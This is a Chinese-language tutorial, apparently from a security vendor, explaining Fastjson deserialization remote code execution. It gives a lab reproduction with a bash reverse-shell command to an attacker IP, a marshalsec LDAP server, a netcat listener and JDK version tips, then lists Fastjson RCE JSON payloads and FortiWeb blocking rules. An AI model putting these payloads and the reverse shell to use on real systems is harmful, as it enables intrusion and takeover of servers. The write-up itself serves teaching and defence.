01

漏洞的原理



FastJson漏洞原理


通过Fastjson反序列化漏洞，攻击者可以传入一个恶意构造的JSON内容，程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意函数，进而导致代码执行。

那么，如何才能够反序列化出恶意类呢？

例如代码写Object o = JSON.parseObject(poc,Object.class)就可以反序列化出Object类或其任意子类，而Object又是任意类的父类，所以就可以反序列化出所有类。

接着，如何才能触发反序列化得到的恶意类中的恶意函数呢？

在某些情况下进行反序列化时会将反序列化得到的类的构造函数、getter方法、setter方法执行一遍，如果这三种方法中存在危险操作，则可能导致反序列化漏洞的存在。换句话说，就是攻击者传入要进行反序列化的类中的构造函数、getter方法、setter方法中要存在漏洞才能触发。


漏洞原理总结


    若反序列化指定类型的类如“Student obj = JSON.parseObject(text, Student.class);”，该类本身的构造函数、setter方法、getter方法存在危险操作，则存在Fastjson反序列化漏洞；

    若反序列化未指定类型的类如“Object obj = JSON.parseObject(text, Object.class);”，该若该类的子类的构造方法、setter方法、getter方法存在危险操作，则存在Fastjson反序列化漏洞。


POC写法


一般的，Fastjson反序列化漏洞的PoC写法如下，@type指定了反序列化得到的类：



关键是要找出一个特殊的在目标环境中已存在的类，满足如下两个条件：

    该类的构造函数、setter方法、getter方法中的某一个存在危险操作，比如造成命令执行；

    可以控制该漏洞函数的变量（一般就是该类的属性）。


02

漏洞环境搭建



攻击拓扑介绍


fastjson漏洞环境：Debian10+Tomcat 8.5
攻击环境：Kali 2020   开启ldap服务、Web服务、Netcat(接收反弹shell)


环境验证


Tomcat环境运行成功如下图所示：


Fastjson运行成功如下图所示：


03

漏洞POC复现



编译Shell文件


1、编写Shell.java文件，反弹shell地址写入到Rutime.getRuntime().exec中
替换自己对应的IP地址：

"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/{IP}/1234 0>&1"



2.编译Shell.java ---> Shell.class

root@kali:~/Downloads/Fastjson1.2.47# javac shell.java

搭建简易HTTP服务器


python -m SimpleHTTPServer 9000 （需要安装Python）
开启Web服务，端口9000，访问正常跳出页面。


搭建LDAP服务器


监听LDAP,命令如下：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.98.30:9000/#shell 4000

说明：

1、通过已编译好的Marshalsec工具快速开启LDAP或者RMI服务

2、/#shell 代表HTTP站点目录下必须有Shell.class文件，并调用该文件
3、设置监听端口为4000

开启NC监听


开启Netcat监听1234端口（必须同3.1中一致）。

图片


构建Payload


反弹验证成功


可以正常反弹shell，并获得交互式tty。


注意事项


1、推荐使用LDAP监听的方式来做漏洞利用，由于JDK版本修复，推荐使用8u181前的版本：

    RMI协议的利用方式在JDK 6u132/7u122/8u113 及以上版本中已修复；

    LDAP协议的利用方式在JDK 6u211/7u201/8u191 及以上版本中已修复。

2、Javac编译失败的话，大部分原因是由于同JDK版本差异太大导致，建议相同版本。

3、记得开放防火墙需要用到的端口。
4、本次漏洞环境中对应的JDK版本信息如下：


04

Fortinet FortiWeb Web应用防火墙对该漏洞的防护



对于反序列化攻击的防护


针对反序列化攻击,我们可以查看下往年其他版本的Fastjson的payload：
 
fastjson<=1.2.43 RCE
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/Exploit", "autoCommit":true}
fastjson<=1.2.45 RCE
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/Exploit"}}
fastjson<=1.2.47 RCE
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://x.x.x.x:1098/jndi",
"autoCommit": true
… …

结论：

@type 必须有；

ldap://，rmi://，二选一；
对于请求参数中含有getRuntime().exec()的，一律拦截。

FortiWeb防护策略开启


由于Fortiweb已经内置了针对FastJson的攻击特征，只需要开启“Know Exploits”即可。
 
拦截成功


再次发起攻击，Fortiweb可以正常拦截攻击，并记录对应的攻击行为存储于日志中。

05

Fastjson<1.2.68的漏洞防护


 

漏洞Payload


在FastJsson 1.2.68 环境中，通过AutoType绕过，构造反序列化POC，达到任意命令执行、敏感信息泄露等威胁。

测试POC：

Fortiweb攻击阻断


通过自定义攻击特征库，匹配拦截。